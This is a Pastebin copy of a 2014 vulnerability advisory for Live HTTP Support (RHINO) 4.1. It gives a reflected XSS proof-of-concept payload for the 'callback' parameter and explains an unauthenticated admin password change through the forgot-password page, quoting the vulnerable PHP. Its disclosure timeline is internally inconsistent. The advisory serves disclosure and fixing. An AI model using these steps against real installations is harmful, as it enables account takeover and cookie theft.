Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Full title Live HTTP Support (RHINO) 4.1 Cross Site Scripting Vulnerability
- Date add 2014-03-02
- Category web applications
- Platform php
- Risk <font color="#FFFF00">Security Risk Medium</font>
- Description Live HTTP Support (RHINO) version 4.1 suffers from cross site scripting and remote change password vulnerabilities.
- =======================================
- Advisory: Live http support (RHINO) 4.1 (Frontend) - XSS & Remote
- Change Password
- Author: Slotleet
- Email: Slotleet@Gmail.com
- Affected Software: Successfully tested on Live http support (RHINO) 4.1
- Vendor URL: http://www.livesupportrhino.com
- Vendor Status: Not Fixed
- ==========================
- Vulnerability Description
- ==========================
- The Live http Support (RHINO) 4.1 (Backend) is prone to XSS & Remote Change
- Password
- ==========================
- PoC-Exploit
- ==========================
- // Non-Persistent XSS with "callback" Parameter in
- /include/proactive_cross.php
- (1) Under "callback" set your GET Parameter Callback to
- "><script>alert(document.cookie)</script>
- The Non-Persistent XSS will be executed for the Administrator in the
- browser (he directly logged in because you chatting with him)
- // Remote Change Password - with "Forgot.php"
- http://[target]/rhino/operator/index.php?p=forgot
- (1) in the forgot file there's no condition if the user logged in or not,
- so we can look deeply in the file in line (27-67)
- if ($_SERVER["REQUEST_METHOD"] == 'POST' && isset($_POST['newP'])) {
- $defaults = $_POST;
- $femail = filter_var($_POST['f_email'], FILTER_SANITIZE_EMAIL);
- $pass = $_POST['f_pass'];
- $newpass = $_POST['f_newpass'];
- if ($pass != $newpass) {
- $errors['e1'] = $tl['error']['e10'];
- } elseif (strlen($pass) <= '5') {
- $errors['e1'] = $tl['error']['e11'];
- }
- if ($defaults['f_email'] == '' || !filter_var($defaults['f_email'],
- FILTER_VALIDATE_EMAIL)) {
- $errors['e'] = $tl['error']['e3'];
- }
- $fwhen = 0;
- $user_check = $lsuserlogin->lsForgotpassword($femail, $fwhen);
- if ($user_check == true && count($errors) == 0) {
- // The new password encrypt with hash_hmac
- $passcrypt = hash_hmac('sha256', $pass, DB_PASS_HASH);
- $result2 = $lsdb->query('UPDATE '.DB_PREFIX.'user SET password =
- "'.$passcrypt.'", forgot = 0 WHERE email = "'.smartsql($femail).'"');
- $result = $lsdb->query('SELECT username FROM '.DB_PREFIX.'user WHERE
- email = "'.smartsql($femail).'" LIMIT 1');
- $row = $result->fetch_assoc();
- if (!$result) {
- ls_redirect(JAK_PARSE_ERROR);
- } else {
- $lsuserlogin->lsLogin($row['username'], $pass, 0);
- ls_redirect(BASE_URL);
- }
- } else {
- $errorsf = $errors;
- }
- }
- So there is an MySQL Query to execute if the email in the database (Show up
- the change password settings).
- ALL YOU HAVE TO DO IS DISCOVER THE E-MAIL ADDRESS THAT PUTTED WHEN ADMIN
- INSTALLED THE SCRIPT.
- ==========================
- Solution
- ==========================
- Send activation code to the e-mail address.
- ==========================
- Disclosure Timeline
- ==========================
- 30-Jan-2014 - developer informed by email
- 30-Jan-2014 - Developer didn't Respond
- 31-Jan-2014 - Still Not Respond
- 06-Feb-2014 - Vulnerability Discovered
- ==========================
- Credits
- ==========================
- Vulnerabilities found and advisory written by Slotleet.
Add Comment
Please, Sign In to add comment